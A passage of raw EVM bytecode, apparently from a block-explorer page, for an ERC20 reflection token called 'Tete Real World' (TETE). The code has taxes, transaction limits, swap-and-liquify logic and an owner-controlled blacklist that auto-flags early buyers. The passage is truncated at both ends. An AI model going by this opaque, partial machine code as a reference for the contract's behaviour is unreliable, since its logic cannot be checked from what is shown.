16908315150217905550565b6000600654821115610d0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d01906133ef565b60405180910390fd5b610d12611f35565b82610d1d919061346d565b9050919050565b60006012905090565b600080610d38611630565b9050610d59818585610d4a85896113e1565b610d54919061349e565b611638565b600191505092915050565b60004790506000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051610db190613503565b60006040518083038185875af1925050503d8060008114610dee576040519150601f19603f3d011682016040523d82523d6000602084013e610df3565b606091505b5050809150505050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161480610e915750610e62611071565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b610ed0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec79061358a565b60405180910390fd5b80601760036101000a81548160ff02191690831515021790555050565b60145481565b600a5481565b60106020528060005260406000206000915054906101000a900460ff1681565b6000606482610f2730610f54565b610f3191906135aa565b610f3b919061346d565b90506000811115610f5057610f4f81611f51565b5b5050565b6000610f9e600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cc3565b9050919050565b610fad611801565b610fb760006122d5565b565b610fc1611801565b606481610fcc610c02565b610fd691906135aa565b610fe0919061346d565b600a8190555050565b610ff1611801565b801561103457816018600082015181600001556020820151816001015560408201518160020155606082015181600301556080820151816004015590505061106d565b81601d60008201518160000155602082015181600101556040820151816002015560608201518160030155608082015181600401559050505b5050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600480546110aa9061334c565b80601f01602080910402602001604051908101604052809291908181526020018280546110d69061334c565b80156111235780601f106110f857610100808354040283529160200191611123565b820191906000526020600020905b81548152906001019060200180831161110657829003601f168201915b5050505050905090565b611135611801565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f194c6407864834414a3adaa18aab4cb81b733d5986a0c3b1e0fc9a8bccc0c0fb60405160405180910390a36111e3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000610c0c565b81600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611251600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610c0c565b5050565b60116020528060005260406000206000915054906101000a900460ff1681565b60126020528060005260406000206000915054906101000a900460ff1681565b6000806112a0611630565b905060006112ae82866113e1565b9050838110156112f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112ea9061365e565b60405180910390fd5b6113008286868403611638565b60019250505092915050565b600080611317611630565b905061132481858561190b565b600191505092915050565b600c5481565b60228060000154908060010154908060020154908060030154908060040154905085565b60165481565b611367611801565b80601760026101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc159816040516113b09190612ee7565b60405180910390a150565b60136020528060005260406000206000915054906101000a900460ff1681565b60155481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b611470611801565b80601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015157f3159dadbd8e2d720a851b412e3358e7e44bb11734c9bfd5715340e21798e8b25836040516114f9919061326f565b60405180910390a25050565b61150d611801565b606481611518610c02565b61152291906135aa565b61152c919061346d565b600c8190555050565b60188060000154908060010154908060020154908060030154908060040154905085565b611561611801565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036115d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115c7906136f0565b60405180910390fd5b6115d9816122d5565b50565b6115e4611801565b6064816115ef610c02565b6115f991906135aa565b611603919061346d565b600b8190555050565b601d8060000154908060010154908060020154908060030154908060040154905085565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036116a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161169e90613782565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611716576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161170d90613814565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516117f49190612f7c565b60405180910390a3505050565b611809611630565b73ffffffffffffffffffffffffffffffffffffffff16611827611071565b73ffffffffffffffffffffffffffffffffffffffff161461187d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187490613880565b60405180910390fd5b565b600061188b84846113e1565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461190557818110156118f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ee906138ec565b60405180910390fd5b6119048484848403611638565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361197a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119719061397e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119e9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119e090613a10565b60405180910390fd5b601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611a76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a6d90613a7c565b60405180910390fd5b60008111611ab9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab090613b0e565b60405180910390fd5b611ac283610f54565b811115611b04576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611afb90613ba0565b60405180910390fd5b6000601160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611ba75750601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1590508015611d7257601360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611cf257601760009054906101000a900460ff16611c6f576001601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b601860226000820154816000015560018201548160010155600282015481600201556003820154816003015560048201548160040155905050600b54821115611ced576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ce490613c0c565b60405180910390fd5b611d71565b601d60226000820154816000015560018201548160010155600282015481600201556003820154816003015560048201548160040155905050600c54821115611d70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6790613c9e565b60405180910390fd5b5b5b601760019054906101000a900460ff16158015611dd95750601360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015611df15750601760029054906101000a900460ff165b8015611e305750611e00611071565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611e6f5750611e3f611071565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b8015611ec95750600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611edf5750600d54611edc30610f54565b10155b15611f23576001601760016101000a81548160ff021916908315150217905550611f0761239b565b6000601760016101000a81548160ff0219169083151502179055505b611f2f848484846123ef565b50505050565b6000611f3f610c02565b600654611f4c919061346d565b905090565b6000602760040154602760030154602760020154611f6f919061349e565b611f79919061349e565b905060008060028360276004015486611f9291906135aa565b611f9c919061346d565b611fa6919061346d565b905060008185611fb69190613cbe565b90506000479050611fc6826127bc565b60008147611fd49190613cbe565b905060008660276003015483611fea91906135aa565b611ff4919061346d565b90506000876027600201548461200a91906135aa565b612014919061346d565b905060008183856120259190613cbe565b61202f9190613cbe565b905060276004015460156000828254612048919061349e565b92505081905550600060276004018190555060006027600201819055506000602760030181905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16826040516120b690613503565b60006040518083038185875af1925050503d80600081146120f3576040519150601f19603f3d011682016040523d82523d6000602084013e6120f8565b606091505b50508098505060008711801561210e5750600081115b801561212d575060011515601760039054906101000a900460ff161515145b1561223b57600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71982308a600080600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b81526004016121bb96959493929190613d4e565b60606040518083038185885af11580156121d9573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906121fe9190613dc4565b5050507f38f8a0c92f4c5b0b6877f878cb4c0c8d348a47b76d716c8e78f425043df9515b8782604051612232929190613e17565b60405180910390a15b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168360405161228190613503565b60006040518083038185875af1925050503d80600081146122be576040519150601f19603f3d011682016040523d82523d6000602084013e6122c3565b606091505b50508098505050505050505050505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006123a630610f54565b9050600d548111156123ec576014600d546123c191906135aa565b8111156123da576014600d546123d791906135aa565b90505b6123eb6123e630610f54565b611f51565b5b50565b6123f7612c80565b6123ff612c80565b61240984846129d2565b809250819350505060008260c00151856124239190613cbe565b9050600061242f611f35565b8661243a91906135aa565b905060008360c001518261244e9190613cbe565b9050601260008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806124bd5750600a54836124b08a610f54565b6124ba919061349e565b11155b6124fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124f390613eb2565b60405180910390fd5b81600e60008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461254b9190613cbe565b9250508190555080600e60008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546125a1919061349e565b92505081905550851561274c578360000151600660008282546125c49190613cbe565b925050819055508460000151601460008282546125e1919061349e565b925050819055506125f28585612bc2565b600060226000015411156126e257846020015160166000828254612616919061349e565b925050819055508360200151600e60008073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612670919061349e565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff163073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87602001516040516126d99190612f7c565b60405180910390a35b3073ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760a001516040516127439190612f7c565b60405180910390a35b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516127a99190612f7c565b60405180910390a3505050505050505050565b6000600267ffffffffffffffff8111156127d9576127d8613119565b5b6040519080825280602002602001820160405280156128075781602001602082028036833780820191505090505b509050308160008151811061281f5761281e613ed2565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156128c6573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906128ea9190613f16565b816001815181106128fe576128fd613ed2565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040161299c959493929190614001565b600060405180830381600087803b1580156129b657600080fd5b505af11580156129ca573d6000803e3d6000fd5b505050505050565b6129da612c80565b6129e2612c80565b8215612bbb5760006129f2611f35565b9050606460226004015486612a0791906135aa565b612a11919061346d565b836000018181525050606460226000015486612a2d91906135aa565b612a37919061346d565b836020018181525050606460226003015486612a5391906135aa565b612a5d919061346d565b836040018181525050606460226002015486612a7991906135aa565b612a83919061346d565b836060018181525050606460226001015486612a9f91906135aa565b612aa9919061346d565b836080018181525050826080015183606001518460400151612acb919061349e565b612ad5919061349e565b8360a00181815250508260a0015183602001518460000151612af7919061349e565b612b01919061349e565b8360c0018181525050808360000151612b1a91906135aa565b826000018181525050808360200151612b3391906135aa565b826020018181525050808360400151612b4c91906135aa565b826040018181525050808360600151612b6591906135aa565b826060018181525050808360800151612b7e91906135aa565b826080018181525050808360c00151612b9791906135aa565b8260c0018181525050808360a00151612bb091906135aa565b8260a0018181525050505b9250929050565b8060a00151600e60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612c15919061349e565b92505081905550816080015160276004016000828254612c35919061349e565b92505081905550816040015160276002016000828254612c55919061349e565b92505081905550816060015160276003016000828254612c75919061349e565b925050819055505050565b6040518060e00160405280600081526020016000815260200160008152602001600081526020016000815260200160008152602001600081525090565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6000612d02612cfd612cf884612cbd565b612cdd565b612cbd565b9050919050565b6000612d1482612ce7565b9050919050565b6000612d2682612d09565b9050919050565b612d3681612d1b565b82525050565b6000602082019050612d516000830184612d2d565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612d91578082015181840152602081019050612d76565b60008484015250505050565b6000601f19601f8301169050919050565b6000612db982612d57565b612dc38185612d62565b9350612dd3818560208601612d73565b612ddc81612d9d565b840191505092915050565b60006020820190508181036000830152612e018184612dae565b905092915050565b6000604051905090565b600080fd5b6000612e2382612cbd565b9050919050565b612e3381612e18565b8114612e3e57600080fd5b50565b600081359050612e5081612e2a565b92915050565b6000819050919050565b612e6981612e56565b8114612e7457600080fd5b50565b600081359050612e8681612e60565b92915050565b60008060408385031215612ea357612ea2612e13565b5b6000612eb185828601612e41565b9250506020612ec285828601612e77565b9150509250929050565b60008115159050919050565b612ee181612ecc565b82525050565b6000602082019050612efc6000830184612ed8565b92915050565b6000612f0d82612cbd565b9050919050565b612f1d81612f02565b8114612f2857600080fd5b50565b600081359050612f3a81612f14565b92915050565b600060208284031215612f5657612f55612e13565b5b6000612f6484828501612f2b565b91505092915050565b612f7681612e56565b82525050565b6000602082019050612f916000830184612f6d565b92915050565b612fa081612ecc565b8114612fab57600080fd5b50565b600081359050612fbd81612f97565b92915050565b60008060408385031215612fda57612fd9612e13565b5b6000612fe885828601612e41565b9250506020612ff985828601612fae565b9150509250929050565b60008060006060848603121561301c5761301b612e13565b5b600061302a86828701612e41565b935050602061303b86828701612e41565b925050604061304c86828701612e77565b9150509250925092565b60006020828403121561306c5761306b612e13565b5b600061307a84828501612e77565b91505092915050565b600060ff82169050919050565b61309981613083565b82525050565b60006020820190506130b46000830184613090565b92915050565b6000602082840312156130d0576130cf612e13565b5b60006130de84828501612fae565b91505092915050565b6000602082840312156130fd576130fc612e13565b5b600061310b84828501612e41565b91505092915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61315182612d9d565b810181811067ffffffffffffffff821117156131705761316f613119565b5b80604052505050565b6000613183612e09565b905061318f8282613148565b919050565b600060a082840312156131aa576131a9613114565b5b6131b460a0613179565b905060006131c484828501612e77565b60008301525060206131d884828501612e77565b60208301525060406131ec84828501612e77565b604083015250606061320084828501612e77565b606083015250608061321484828501612e77565b60808301525092915050565b60008060c0838503121561323757613236612e13565b5b600061324585828601613194565b92505060a061325685828601612fae565b9150509250929050565b61326981612e18565b82525050565b60006020820190506132846000830184613260565b92915050565b600060a08201905061329f6000830188612f6d565b6132ac6020830187612f6d565b6132b96040830186612f6d565b6132c66060830185612f6d565b6132d36080830184612f6d565b9695505050505050565b600080604083850312156132f4576132f3612e13565b5b600061330285828601612e41565b925050602061331385828601612e41565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061336457607f821691505b6020821081036133775761337661331d565b5b50919050565b7f416d6f756e74206d757374206265206c657373207468616e20746f74616c207260008201527f65666c656374696f6e7300000000000000000000000000000000000000000000602082015250565b60006133d9602a83612d62565b91506133e48261337d565b604082019050919050565b60006020820190508181036000830152613408816133cc565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061347882612e56565b915061348383612e56565b9250826134935761349261340f565b5b828204905092915050565b60006134a982612e56565b91506134b483612e56565b92508282019050808211156134cc576134cb61343e565b5b92915050565b600081905092915050565b50565b60006134ed6000836134d2565b91506134f8826134dd565b600082019050919050565b600061350e826134e0565b9150819050919050565b7f4f6e6c7920646576656c6f706572732063616e206368616e676520746869732060008201527f666c616700000000000000000000000000000000000000000000000000000000602082015250565b6000613574602483612d62565b915061357f82613518565b604082019050919050565b600060208201905081810360008301526135a381613567565b9050919050565b60006135b582612e56565b91506135c083612e56565b92508282026135ce81612e56565b915082820484148315176135e5576135e461343e565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000613648602583612d62565b9150613653826135ec565b604082019050919050565b600060208201905081810360008301526136778161363b565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006136da602683612d62565b91506136e58261367e565b604082019050919050565b60006020820190508181036000830152613709816136cd565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061376c602483612d62565b915061377782613710565b604082019050919050565b6000602082019050818103600083015261379b8161375f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006137fe602283612d62565b9150613809826137a2565b604082019050919050565b6000602082019050818103600083015261382d816137f1565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061386a602083612d62565b915061387582613834565b602082019050919050565b600060208201905081810360008301526138998161385d565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006138d6601d83612d62565b91506138e1826138a0565b602082019050919050565b60006020820190508181036000830152613905816138c9565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000613968602583612d62565b91506139738261390c565b604082019050919050565b600060208201905081810360008301526139978161395b565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006139fa602383612d62565b9150613a058261399e565b604082019050919050565b60006020820190508181036000830152613a29816139ed565b9050919050565b7f45524332303a206164647265737320626c61636b6c69737465642028626f7429600082015250565b6000613a66602083612d62565b9150613a7182613a30565b602082019050919050565b60006020820190508181036000830152613a9581613a59565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000613af8602983612d62565b9150613b0382613a9c565b604082019050919050565b60006020820190508181036000830152613b2781613aeb565b9050919050565b7f596f752061726520747279696e6720746f207472616e73666572206d6f72652060008201527f7468616e20796f75722062616c616e6365000000000000000000000000000000602082015250565b6000613b8a603183612d62565b9150613b9582613b2e565b604082019050919050565b60006020820190508181036000830152613bb981613b7d565b9050919050565b7f616d6f756e74206d757374206265203c3d206d61785478416d6f756e74427579600082015250565b6000613bf6602083612d62565b9150613c0182613bc0565b602082019050919050565b60006020820190508181036000830152613c2581613be9565b9050919050565b7f616d6f756e74206d757374206265203c3d206d61785478416d6f756e7453656c60008201527f6c00000000000000000000000000000000000000000000000000000000000000602082015250565b6000613c88602183612d62565b9150613c9382613c2c565b604082019050919050565b60006020820190508181036000830152613cb781613c7b565b9050919050565b6000613cc982612e56565b9150613cd483612e56565b9250828203905081811115613cec57613ceb61343e565b5b92915050565b6000819050919050565b6000613d17613d12613d0d84613cf2565b612cdd565b612e56565b9050919050565b613d2781613cfc565b82525050565b6000613d3882612d09565b9050919050565b613d4881613d2d565b82525050565b600060c082019050613d636000830189613260565b613d706020830188612f6d565b613d7d6040830187613d1e565b613d8a6060830186613d1e565b613d976080830185613d3f565b613da460a0830184612f6d565b979650505050505050565b600081519050613dbe81612e60565b92915050565b600080600060608486031215613ddd57613ddc612e13565b5b6000613deb86828701613daf565b9350506020613dfc86828701613daf565b9250506040613e0d86828701613daf565b9150509250925092565b6000604082019050613e2c6000830185612f6d565b613e396020830184612f6d565b9392505050565b7f526563697069656e742063616e6e6f7420686f6c64206d6f7265207468616e2060008201527f6d617857616c6c6574416d6f756e740000000000000000000000000000000000602082015250565b6000613e9c602f83612d62565b9150613ea782613e40565b604082019050919050565b60006020820190508181036000830152613ecb81613e8f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050613f1081612e2a565b92915050565b600060208284031215613f2c57613f2b612e13565b5b6000613f3a84828501613f01565b91505092915050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b613f7881612e18565b82525050565b6000613f8a8383613f6f565b60208301905092915050565b6000602082019050919050565b6000613fae82613f43565b613fb88185613f4e565b9350613fc383613f5f565b8060005b83811015613ff4578151613fdb8882613f7e565b9750613fe683613f96565b925050600181019050613fc7565b5085935050505092915050565b600060a0820190506140166000830188612f6d565b6140236020830187613d1e565b81810360408301526140358186613fa3565b90506140446060830185613260565b6140516080830184612f6d565b969550505050505056fea264697066735822122006032dc04b4954b151e8165cb3dbe59753a0b823c3cdac3e189b995e815f5c1064736f6c634300081100330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000000f54657465205265616c20576f726c64000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045445544500000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x6080604052600436106102555760003560e01c806373f33bd311610139578063b897a7f2116100b6578063df2abc241161007a578063df2abc24146108fd578063ef998cf014610926578063f2bc6ea41461094f578063f2fde38b1461097e578063f53bc835146109a7578063fc962edb146109d05761025c565b8063b897a7f214610804578063c49b9a801461082f578063c592720714610858578063d43ad1e914610895578063dd62ed3e146108c05761025c565b80639cc29950116100fd5780639cc29950146106f3578063a457c2d714610730578063a9059cbb1461076d578063a98aa6ee146107aa578063a9c21468146107d55761025c565b806373f33bd31461060e5780638da5cb5b1461063757806395d89b411461066257806399ec86fe1461068d5780639b4f462d146106b65761025c565b806339509351116101d25780635040c6e7116101965780635040c6e714610500578063570eafa71461052b57806368dc04c31461056857806370a0823114610591578063715018a6146105ce57806372a2f352146105e55761025c565b8063395093511461042d5780633ccfd60b1461046a578063407bf9c2146104815780634947a42c146104ac5780634d3314f4146104d55761025c565b80631850e44f116102195780631850e44f1461034857806323b872dd1461037157806327b82704146103ae5780632d838119146103c5578063313ce567146104025761025c565b8063055add0d1461026157806306fdde031461028c578063095ea7b3146102b75780630a4ea202146102f457806318160ddd1461031d5761025c565b3661025c57005b600080fd5b34801561026d57600080fd5b506102766109ff565b6040516102839190612d3c565b60405180910390f35b34801561029857600080fd5b506102a1610a25565b6040516102ae9190612de7565b60405180910390f35b3480156102c357600080fd5b506102de60048036038101906102d99190612e8c565b610ab7565b6040516102eb9190612ee7565b60405180910390f35b34801561030057600080fd5b5061031b60048036038101906103169190612f40565b610ada565b005b34801561032957600080fd5b50610332610c02565b60405161033f9190612f7c565b60405180910390f35b34801561035457600080fd5b5061036f600480360381019061036a9190612fc3565b610c0c565b005b34801561037d57600080fd5b5061039860048036038101906103939190613003565b610c6f565b6040516103a59190612ee7565b60405180910390f35b3480156103ba57600080fd5b506103c3610c9e565b005b3480156103d157600080fd5b506103ec60048036038101906103e79190613056565b610cc3565b6040516103f99190612f7c565b60405180910390f35b34801561040e57600080fd5b50610417610d24565b604051610424919061309f565b60405180910390f35b34801561043957600080fd5b50610454600480360381019061044f9190612e8c565b610d2d565b6040516104619190612ee7565b60405180910390f35b34801561047657600080fd5b5061047f610d64565b005b34801561048d57600080fd5b50610496610dfd565b6040516104a39190612f7c565b60405180910390f35b3480156104b857600080fd5b506104d360048036038101906104ce91906130ba565b610e03565b005b3480156104e157600080fd5b506104ea610eed565b6040516104f79190612f7c565b60405180910390f35b34801561050c57600080fd5b50610515610ef3565b6040516105229190612f7c565b60405180910390f35b34801561053757600080fd5b50610552600480360381019061054d91906130e7565b610ef9565b60405161055f9190612ee7565b60405180910390f35b34801561057457600080fd5b5061058f600480360381019061058a9190613056565b610f19565b005b34801561059d57600080fd5b506105b860048036038101906105b391906130e7565b610f54565b6040516105c59190612f7c565b60405180910390f35b3480156105da57600080fd5b506105e3610fa5565b005b3480156105f157600080fd5b5061060c60048036038101906106079190613056565b610fb9565b005b34801561061a57600080fd5b5061063560048036038101906106309190613220565b610fe9565b005b34801561064357600080fd5b5061064c611071565b604051610659919061326f565b60405180910390f35b34801561066e57600080fd5b5061067761109b565b6040516106849190612de7565b60405180910390f35b34801561069957600080fd5b506106b460048036038101906106af9190612f40565b61112d565b005b3480156106c257600080fd5b506106dd60048036038101906106d891906130e7565b611255565b6040516106ea9190612ee7565b60405180910390f35b3480156106ff57600080fd5b5061071a600480360381019061071591906130e7565b611275565b6040516107279190612ee7565b60405180910390f35b34801561073c57600080fd5b5061075760048036038101906107529190612e8c565b611295565b6040516107649190612ee7565b60405180910390f35b34801561077957600080fd5b50610794600480360381019061078f9190612e8c565b61130c565b6040516107a19190612ee7565b60405180910390f35b3480156107b657600080fd5b506107bf61132f565b6040516107cc9190612f7c565b60405180910390f35b3480156107e157600080fd5b506107ea611335565b6040516107fb95949392919061328a565b60405180910390f35b34801561081057600080fd5b50610819611359565b6040516108269190612f7c565b60405180910390f35b34801561083b57600080fd5b50610856600480360381019061085191906130ba565b61135f565b005b34801561086457600080fd5b5061087f600480360381019061087a91906130e7565b6113bb565b60405161088c9190612ee7565b60405180910390f35b3480156108a157600080fd5b506108aa6113db565b6040516108b79190612f7c565b60405180910390f35b3480156108cc57600080fd5b506108e760048036038101906108e291906132dd565b6113e1565b6040516108f49190612f7c565b60405180910390f35b34801561090957600080fd5b50610924600480360381019061091f9190612fc3565b611468565b005b34801561093257600080fd5b5061094d60048036038101906109489190613056565b611505565b005b34801561095b57600080fd5b50610964611535565b60405161097595949392919061328a565b60405180910390f35b34801561098a57600080fd5b506109a560048036038101906109a091906130e7565b611559565b005b3480156109b357600080fd5b506109ce60048036038101906109c99190613056565b6115dc565b005b3480156109dc57600080fd5b506109e561160c565b6040516109f695949392919061328a565b60405180910390f35b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610a349061334c565b80601f0160208091040260200160405190810160405280929190818152602001828054610a609061334c565b8015610aad5780601f10610a8257610100808354040283529160200191610aad565b820191906000526020600020905b815481529060010190602001808311610a9057829003601f168201915b5050505050905090565b600080610ac2611630565b9050610acf818585611638565b600191505092915050565b610ae2611801565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f0f9ab6c7b3a29f5eca7cf80f42ea6b1262432064b221200268394c9a5e63569f60405160405180910390a3610b90600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000610c0c565b81600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610bfe600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610c0c565b5050565b6000600254905090565b610c14611801565b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600080610c7a611630565b9050610c8785828561187f565b610c9285858561190b565b60019150509392505050565b610ca6611801565b6001601760006101000a81548160ff021916908315150217905550565b6000600654821115610d0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d01906133ef565b60405180910390f